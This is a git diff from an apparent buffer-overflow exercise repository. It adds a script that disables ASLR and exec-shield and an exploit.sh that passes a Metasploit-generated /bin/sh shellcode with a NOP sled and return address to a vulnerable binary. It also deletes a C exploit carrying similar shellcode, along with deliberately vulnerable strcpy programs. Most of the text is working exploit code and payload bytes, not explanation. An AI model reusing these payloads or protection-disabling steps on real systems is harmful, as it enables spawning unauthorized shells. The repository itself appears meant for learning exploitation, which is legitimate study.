diff options
| -rw-r--r-- | Makefile | 29 | ||||
| -rwxr-xr-x | disable_prot.sh | 9 | ||||
| -rw-r--r-- | exploit.c | 51 | ||||
| -rwxr-xr-x | exploit.sh | 8 | ||||
| -rw-r--r-- | overflow.c | 27 | ||||
| -rw-r--r-- | overflow_function.c | 16 | ||||
| -rw-r--r-- | overflow_minimal.c | 11 |
7 files changed, 34 insertions, 117 deletions
@@ -2,30 +2,19 @@ RM := rm CC := gcc CFLAGS = -Wall -g3 OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector -BINS = exploit -OBINS = overflow overflow_minimal overflow_function exploit +TARGETS = $(patsubst %.c,%.o,$(wildcard *.c)) -all: exploit overflow +all: $(TARGETS) msg -exploit: - @echo 'building exploits' - for file in $(BINS); do \ - $(CC) $(CFLAGS) exploit.c -o exploit; \ - done +msg: + @echo "now run:" + @echo " ./disable_prot.sh" + @echo " ./exploit" -overflow: - @echo 'building exploitable binaries' - for file in $(OBINS); do \ - $(CC) $(CFLAGS) $(OCFLAGS) $$file.c -o $$file; \ - done +%.o : %.c + $(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $< clean: - for file in $(BINS); do \ - $(RM) -f $$file; \ - done - for file in $(OBINS); do \ - $(RM) -f $$file; \ - done - @echo ' ' + $(RM) -f $(patsubst %.o,%,$(TARGETS)) .PHONY: all clean diff --git a/disable_prot.sh b/disable_prot.sh new file mode 100755 index 0000000..16498a3 --- /dev/null +++ b/disable_prot.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +if [ `id -u` -ne 0 ]; then + echo "$0: This program should be run as root" +fi + +sysctl -w kernel.randomize_va_space=0 2>/dev/null +sysctl -w kernel.exec-shield=0 2>/dev/null + diff --git a/exploit.c b/exploit.c deleted file mode 100644 index 3137c91..0000000 --- a/exploit.c +++ /dev/null @@ -1,51 +0,0 @@ -/* - * main.c - * - * Created on: 27.01.2012 - * Author: druid - */ - -#include <unistd.h> -#include <stdio.h> -#include <stdlib.h> -#include <fcntl.h> -#include <sys/stat.h> -#include <string.h> - -#define PATH_CT "./overflow" -#define ENV_VAR "EXPLOIT" -#define NOP 0x90 - - -static char shellcode[]= -"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" -"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; - -u_long -esp() -{ - __asm__("movl %esp, %eax"); -} - -int -main() -{ - - u_char buf[1032]; - u_long addr; - int i; - - strcpy(buf, "/usr/bin/pico; "); - - addr = esp() - 192; - for (i = 16; i < 128 + 16; i += 4) - *((u_long *) (buf + i)) = addr; - for (i = 128 + 16; i < 1040; i++) - buf[i] = 0x90; - for (i = 0; i < strlen(shellcode); i++) - buf[1040 + i] = shellcode[i]; - buf[1040 + i] = '\n'; - - setenv(ENV_VAR, buf, 1); - execl(PATH_CT, "overflow", (char *) 0); -} diff --git a/exploit.sh b/exploit.sh new file mode 100755 index 0000000..a078e4a --- /dev/null +++ b/exploit.sh @@ -0,0 +1,8 @@ +#!/bin/sh + +# shellcode generated with metasploit (exec /bin/sh): +# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' + +# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr + +./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` @@ -9,39 +9,28 @@ #include <stdio.h> #include <string.h> -#define ENV_VAR "EXPLOIT" -#define BUFLEN 10 - +/* 300 bytes buffer len + 4 bytes for overwrite return opcode */ +#define BUFLEN 300 void overflow(const char *src, char *dst) { /* exploitable function */ strcpy(dst, src); + /* nothing to do, just return */ } int main(int argc, char **argv) { - char *s, *env; char buf[BUFLEN]; - fprintf(stderr, "buflen: %d\nenv_var: %s\nargs: %d\n\n", BUFLEN, ENV_VAR, (argc - 1)); - if (argc > 1) - { + if (argc > 1) { overflow(argv[1], buf); - } - else if ((env = getenv(ENV_VAR))) - { - overflow(env, buf); - } - else - { - fprintf(stderr, "neither "ENV_VAR" set or arg0 given, abort!\n"); - return(1); - } - - printf("buf: %s\n*buf: %p\nbuflen: %d\n", s, s, strlen(s)); + } else { + fprintf(stderr, "arg1 missing\n"); + return(1); + } return (0); } diff --git a/overflow_function.c b/overflow_function.c deleted file mode 100644 index 6d6e950..0000000 --- a/overflow_function.c +++ /dev/null @@ -1,16 +0,0 @@ -#include <stdio.h> -#include <stdlib.h> -#include <string.h> - -void stupid(char *str) -{ - char buf[30]; - /* exploitable function */ - strcpy(buf, str); -} - -int main(int argc, char **argv) -{ - stupid(argv[1]); - return 0; -} diff --git a/overflow_minimal.c b/overflow_minimal.c deleted file mode 100644 index 760e33f..0000000 --- a/overflow_minimal.c +++ /dev/null @@ -1,11 +0,0 @@ -#include <stdio.h> -#include <stdlib.h> -#include <string.h> - -int main(int argc, char **argv) -{ - char buf[30]; - /* exploitable function */ - strcpy(buf, argv[1]); - return 0; -} |